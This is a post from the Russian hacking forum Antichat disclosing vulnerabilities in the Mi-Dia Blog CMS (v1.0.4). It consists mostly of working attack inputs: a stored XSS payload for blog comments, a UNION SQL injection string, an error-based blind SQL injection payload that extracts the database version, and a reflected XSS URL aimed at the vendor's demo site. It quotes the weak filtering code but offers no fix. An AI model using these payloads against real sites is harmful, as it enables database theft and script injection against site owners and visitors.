Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - Mi-Dia Blog (https://forum.antichat.xyz/showthread.php?t=154824)

Название: Mi-Dia Blog
Автор: Christopher Shaw
Адресс оффициальной странички: http://www.mi-dia.co.uk/

Активная XSS.
В комментариях к записям блога.

Цитата:

[img]javascript:alert()[/img]

SQL Иньекция

Цитата:

?s=view&v=-1'+union+select+1,2,3,4,5,6,7,8,9+--+

Кода много, приведу тока фильтрациб.

PHP код:


		
			
$v = htmlspecialchars($_GET['v']);  

$d = htmlspecialchars($_GET['d']);

product : Mi-Dia Blog v1.0.4
Blind SQL
search --->
mq=off
mysql = 5

Код:

xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1

еще пассивная xss

Код:

http://demo.mi-dia.co.uk/?s=search&tags=%3Cscript%3Ealert(/xss/)%3C/script%3E